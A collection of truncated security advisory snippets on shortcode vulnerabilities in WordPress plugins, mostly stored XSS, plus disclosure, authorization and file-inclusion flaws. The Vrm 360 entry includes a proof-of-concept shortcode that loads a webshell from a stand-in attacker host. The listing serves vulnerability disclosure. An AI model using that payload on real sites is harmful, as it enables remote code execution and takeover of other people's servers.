BP Better Messages < 2.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode

Description The Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output...

CVE-2023-34018

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in SoundCloud Inc. SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 3.1.0...

CVE-2023-34018

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in SoundCloud Inc. SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 3.1.0...

CVE-2023-34018

SoundCloud Shortcode (WordPress plugin)

WordPress Plugin SoundCloud Shortcode Cross-Site Scripting Vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on servers with PHP and MySQL.WordPress plugin is an application plugin. A cross-site scripting vulnerability...

Booster for WooCommerce < 7.1.2 - Authenticated (Subscriber+) Information Disclosure via Shortcode

Description The Booster for WooCommerce for WordPress is vulnerable to Information Disclosure via the 'wcjgetoption' shortcode in versions up to, and including, 7.1.1 due to insufficient controls on the information retrievable via the shortcode. This makes it possible for authenticated attackers,...

eCommerce Product Catalog for WordPress < 3.3.27 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's iccontainer shortcode in all versions up to, and including, 3.3.26 due to insufficient input sanitization and output escaping on user supplied...

CVE-2023-5942

The Medialist WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

CVE-2023-4514

The Mmm Simple File List WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

CVE-2023-4514

The Mmm Simple File List WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

WordPress SoundCloud Shortcode Plugin <= 3.1.0 is vulnerable to Cross Site Scripting (XSS)

Software SoundCloud Shortcode Type Plugin Vulnerable versions = 3.1.0 Fixed in 4.0.0 OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-34018 Patch priority Low CVSS severity Low 5.9 Developer Claim ownership PSID bb0d82ac536c Credits yuyudhn Required...

PT-2023-32432 · WordPress · Medialist

Name of the Vulnerable Software and Affected Versions: Medialist WordPress plugin versions prior to 1.4.1 Description: The issue concerns the Medialist WordPress plugin, which does not properly validate and escape certain shortcode attributes before outputting them in a page or post. This could...

Video PopUp < 1.1.4 - Contributor+ Stored XSS via Shortcode

Description The plugin does not validate and escape some of its videopopup shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

Advanced Custom Fields: Extended < 0.8.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acfeform' shortcode in versions up to, and including, 0.8.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

UserPro < 5.1.2 - Sensitive Information Disclosure via Shortcode

Description The UserPro plugin for WordPress is vulnerable to sensitive information disclosure via the 'userpro' shortcode in versions up to, and including 5.1.1. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible fo...

UserPro < 5.1.5 - Missing Authorization to Arbitrary Shortcode Execution via userpro_shortcode_template

Description The UserPro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'userproshortcodetemplate' function in versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to arbitrary shortcode execution. An...

Leaflet Map < 3.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Leaflet Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor level and above...

EasyRotator for WordPress <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The EasyRotator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easyrotator' shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...

Remote Content Shortcode <= 1.5 - Authenticated(Contributor+) Local File Inclusion via shortcode

Description The Remote Content Shortcode plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.5 via the plugin's shortcode. This allows authenticated attackers with contributor-level privileges and above to include and execute arbitrary files on the serve...